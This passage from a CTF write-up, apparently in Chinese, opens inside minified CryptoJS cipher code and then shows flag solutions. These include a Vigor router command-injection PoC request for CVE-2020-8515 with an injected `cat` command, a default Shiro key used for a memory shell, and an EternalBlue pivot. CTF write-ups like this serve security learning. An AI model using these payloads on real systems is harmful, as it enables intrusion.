:134217760,2147483657:2080,2147483658:131104,2147483659:134350848,2147483660:0,2147483661:134348832,2147483662:134219776,2147483663:131072,16:133152,17:134350848,18:32,19:2048,20:134219776,21:134217760,22:134348832,23:131072,24:0,25:131104,26:134348800,27:134219808,28:134350880,29:133120,30:2080,31:134217728,2147483664:131072,2147483665:2048,2147483666:134348832,2147483667:133152,2147483668:32,2147483669:134348800,2147483670:134217728,2147483671:134219808,2147483672:134350880,2147483673:134217760,2147483674:134219776,2147483675:0,2147483676:133120,2147483677:2080,2147483678:131104,2147483679:134350848}],u=[4160749569,528482304,33030144,2064384,129024,8064,504,2147483679],n=e.DES=r.extend({_doReset:function(){for(var t=this._key.words,e=[],r=0;r<56;r++){var i=h[r]-1;e[r]=t[i>>>5]>>>31-i%32&1}for(var n=this._subKeys=[],o=0;o<16;o++){for(var s=n[o]=[],c=f[o],r=0;r<24;r++)s[r/6|0]|=e[(l[r]-1+c)%28]<<31-r%6,s[4+(r/6|0)]|=e[28+(l[r+24]-1+c)%28]<<31-r%6;s[0]=s[0]<<1|s[0]>>>31;for(r=1;r<7;r++)s[r]=s[r]>>>4*(r-1)+3;s[7]=s[7]<<5|s[7]>>>27}for(var a=this._invSubKeys=[],r=0;r<16;r++)a[r]=n[15-r]},encryptBlock:function(t,e){this._doCryptBlock(t,e,this._subKeys)},decryptBlock:function(t,e){this._doCryptBlock(t,e,this._invSubKeys)},_doCryptBlock:function(t,e,r){this._lBlock=t[e],this._rBlock=t[e+1],p.call(this,4,252645135),p.call(this,16,65535),_.call(this,2,858993459),_.call(this,8,16711935),p.call(this,1,1431655765);for(var i=0;i<16;i++){for(var n=r[i],o=this._lBlock,s=this._rBlock,c=0,a=0;a<8;a++)c|=d[a][((s^n[a])&u[a])>>>0];this._lBlock=s,this._rBlock=o^c}var h=this._lBlock;this._lBlock=this._rBlock,this._rBlock=h,p.call(this,1,1431655765),_.call(this,8,16711935),_.call(this,2,858993459),p.call(this,16,65535),p.call(this,4,252645135),t[e]=this._lBlock,t[e+1]=this._rBlock},keySize:2,ivSize:2,blockSize:2});function p(t,e){e=(this._lBlock>>>t^this._rBlock)&e;this._rBlock^=e,this._lBlock^=e<<t}function _(t,e){e=(this._rBlock>>>t^this._lBlock)&e;this._lBlock^=e,this._rBlock^=e<<t}t.DES=r._createHelper(n);e=e.TripleDES=r.extend({_doReset:function(){var t=this._key.words;if(2!==t.length&&4!==t.length&&t.length<6)throw new Error("Invalid key length - 3DES requires the key length to be 64, 128, 192 or >192.");var e=t.slice(0,2),r=t.length<4?t.slice(0,2):t.slice(2,4),t=t.length<6?t.slice(0,2):t.slice(4,6);this._des1=n.createEncryptor(i.create(e)),this._des2=n.createEncryptor(i.create(r)),this._des3=n.createEncryptor(i.create(t))},encryptBlock:function(t,e){this._des1.encryptBlock(t,e),this._des2.decryptBlock(t,e),this._des3.encryptBlock(t,e)},decryptBlock:function(t,e){this._des3.decryptBlock(t,e),this._des2.encryptBlock(t,e),this._des1.decryptBlock(t,e)},keySize:6,ivSize:2,blockSize:2});t.TripleDES=r._createHelper(e)}(),function(){var t=U,e=t.lib.StreamCipher,r=t.algo,i=r.RC4=e.extend({_doReset:function(){for(var t=this._key,e=t.words,r=t.sigBytes,i=this._S=[],n=0;n<256;n++)i[n]=n;for(var n=0,o=0;n<256;n++){var s=n%r,s=e[s>>>2]>>>24-s%4*8&255,o=(o+i[n]+s)%256,s=i[n];i[n]=i[o],i[o]=s}this._i=this._j=0},_doProcessBlock:function(t,e){t[e]^=n.call(this)},keySize:8,ivSize:0});function n(){for(var t=this._S,e=this._i,r=this._j,i=0,n=0;n<4;n++){var r=(r+t[e=(e+1)%256])%256,o=t[e];t[e]=t[r],t[r]=o,i|=t[(t[e]+t[r])%256]<<24-8*n}return this._i=e,this._j=r,i}t.RC4=e._createHelper(i);r=r.RC4Drop=i.extend({cfg:i.cfg.extend({drop:192}),_doReset:function(){i._doReset.call(this);for(var t=this.cfg.drop;0<t;t--)n.call(this)}});t.RC4Drop=e._createHelper(r)}(),F=(M=U).lib.StreamCipher,P=M.algo,D=[],E=[],R=[],P=P.Rabbit=F.extend({_doReset:function(){for(var t=this._key.words,e=this.cfg.iv,r=0;r<4;r++)t[r]=16711935&(t[r]<<8|t[r]>>>24)|4278255360&(t[r]<<24|t[r]>>>8);for(var i=this._X=[t[0],t[3]<<16|t[2]>>>16,t[1],t[0]<<16|t[3]>>>16,t[2],t[1]<<16|t[0]>>>16,t[3],t[2]<<16|t[1]>>>16],n=this._C=[t[2]<<16|t[2]>>>16,4294901760&t[0]|65535&t[1],t[3]<<16|t[3]>>>16,4294901760&t[1]|65535&t[2],t[0]<<16|t[0]>>>16,4294901760&t[2]|65535&t[3],t[1]<<16|t[1]>>>16,4294901760&t[3]|65535&t[0]],r=this._b=0;r<4;r++)N.call(this);for(r=0;r<8;r++)n[r]^=i[r+4&7];if(e){var o=e.words,s=o[0],c=o[1],e=16711935&(s<<8|s>>>24)|4278255360&(s<<24|s>>>8),o=16711935&(c<<8|c>>>24)|4278255360&(c<<24|c>>>8),s=e>>>16|4294901760&o,c=o<<16|65535&e;n[0]^=e,n[1]^=s,n[2]^=o,n[3]^=c,n[4]^=e,n[5]^=s,n[6]^=o,n[7]^=c;for(r=0;r<4;r++)N.call(this)}},_doProcessBlock:function(t,e){var r=this._X;N.call(this),D[0]=r[0]^r[5]>>>16^r[3]<<16,D[1]=r[2]^r[7]>>>16^r[5]<<16,D[2]=r[4]^r[1]>>>16^r[7]<<16,D[3]=r[6]^r[3]>>>16^r[1]<<16;for(var i=0;i<4;i++)D[i]=16711935&(D[i]<<8|D[i]>>>24)|4278255360&(D[i]<<24|D[i]>>>8),t[e+i]^=D[i]},blockSize:4,ivSize:2}),M.Rabbit=F._createHelper(P),F=(M=U).lib.StreamCipher,P=M.algo,W=[],O=[],I=[],P=P.RabbitLegacy=F.extend({_doReset:function(){for(var t=this._key.words,e=this.cfg.iv,r=this._X=[t[0],t[3]<<16|t[2]>>>16,t[1],t[0]<<16|t[3]>>>16,t[2],t[1]<<16|t[0]>>>16,t[3],t[2]<<16|t[1]>>>16],i=this._C=[t[2]<<16|t[2]>>>16,4294901760&t[0]|65535&t[1],t[3]<<16|t[3]>>>16,4294901760&t[1]|65535&t[2],t[0]<<16|t[0]>>>16,4294901760&t[2]|65535&t[3],t[1]<<16|t[1]>>>16,4294901760&t[3]|65535&t[0]],n=this._b=0;n<4;n++)q.call(this);for(n=0;n<8;n++)i[n]^=r[n+4&7];if(e){var o=e.words,s=o[0],t=o[1],e=16711935&(s<<8|s>>>24)|4278255360&(s<<24|s>>>8),o=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8),s=e>>>16|4294901760&o,t=o<<16|65535&e;i[0]^=e,i[1]^=s,i[2]^=o,i[3]^=t,i[4]^=e,i[5]^=s,i[6]^=o,i[7]^=t;for(n=0;n<4;n++)q.call(this)}},_doProcessBlock:function(t,e){var r=this._X;q.call(this),W[0]=r[0]^r[5]>>>16^r[3]<<16,W[1]=r[2]^r[7]>>>16^r[5]<<16,W[2]=r[4]^r[1]>>>16^r[7]<<16,W[3]=r[6]^r[3]>>>16^r[1]<<16;for(var i=0;i<4;i++)W[i]=16711935&(W[i]<<8|W[i]>>>24)|4278255360&(W[i]<<24|W[i]>>>8),t[e+i]^=W[i]},blockSize:4,ivSize:2}),M.RabbitLegacy=F._createHelper(P),U});
var enc = "LrcNR2XwpNQMORyv85ae1GY16H3aKPkdSyAhv726TgNNTukxUmYvFb0XNnT4QWAZ";
var REQ = "bool";
alert(CryptoJS.AES.decrypt(enc, CryptoJS.enc.Utf8.parse(REQ), {
              mode : CryptoJS.mode.ECB,
              padding : CryptoJS.pad.Pkcs7
            }).toString(CryptoJS.enc.Utf8));

直接跑js代码exp即得flag:flag{39383121F5545635A5EE13C356F8AA18}

REVERSE

简单逆向

ida打开直接有

安卓逆向工程

image

    public void ch3ckflag() {
        if (DonUtils.c(sin() + this.editText.getText().toString() + c().substring(22, 41)).replaceAll("\\s+", "").equals("ZjgyNWFiMGE3ZTlkYjFmZDNlZmUxZDliMzI1MzcxZWJObVlMcklJb0w2ZmFBckprQmhjM05aUkdObVJXWjBhVTlxYw==")) {
            Toast.makeText(this, "flag{" + this.editText.getText().toString() + "}", 0).show();
        } else {
            Toast.makeText(this, "wrong", 0).show();
        }
    }

    public static String getMD5(PackageManager packageManager, String str) {
        try {
            Signature signature = packageManager.getPackageInfo(str, 64).signatures[0];
            MessageDigest messageDigest = MessageDigest.getInstance("MD5");
            messageDigest.update(signature.toByteArray());
            byte[] digest = messageDigest.digest();
            StringBuilder sb = new StringBuilder();
            for (byte b : digest) {
                sb.append(Integer.toString((b & UByte.MAX_VALUE) + 256, 16).substring(1));
            }
            return sb.toString();
        } catch (PackageManager.NameNotFoundException | NoSuchAlgorithmException e) {
            e.printStackTrace();
            return null;
        }
    }

    public String sin() {
        return getMD5(getPackageManager(), DonUtils.d("Y29tLmhhaGFoYS5rZWVwc2ltcGxl"));
    }

md5 + flag + str,故那个base64解码后中间部分就是 flag

md5 32字节,str 19字节,掐头去尾获得 flag:flag{NmYLrIIoL6faArJk}

智能制造

业务系统

直接shiro打个内存马,key是默认的:

kPH+bIxk5D2deZiIxcaaaA==

flag在/root/flag.txt​:

image

智能智造上位机

直接拿刚才的shiro机器frp搭个隧道代理出来当跳板msf永恒之蓝直接梭了,flag在C:\Users\Administrators\Desktop\flag.txt

vigor_router_路由器

CVE-2020-8515​,POC直接发包打:

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 192.26.2.142
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

action=login&keyPath=%27%0acat${IFS}/flag.txt%0a%27&loginUser=TenMap1e&loginPwd=TenMap1e

flag:flag{HJJIJOOMHHNBSEL}。

image

参考链接:

凌武科技wp:https://mp.weixin.qq.com/s/6hTkh97g4otSAI5sv9mJsg

1cepeak(冰峰✌)wp:https://1cepeak.cn/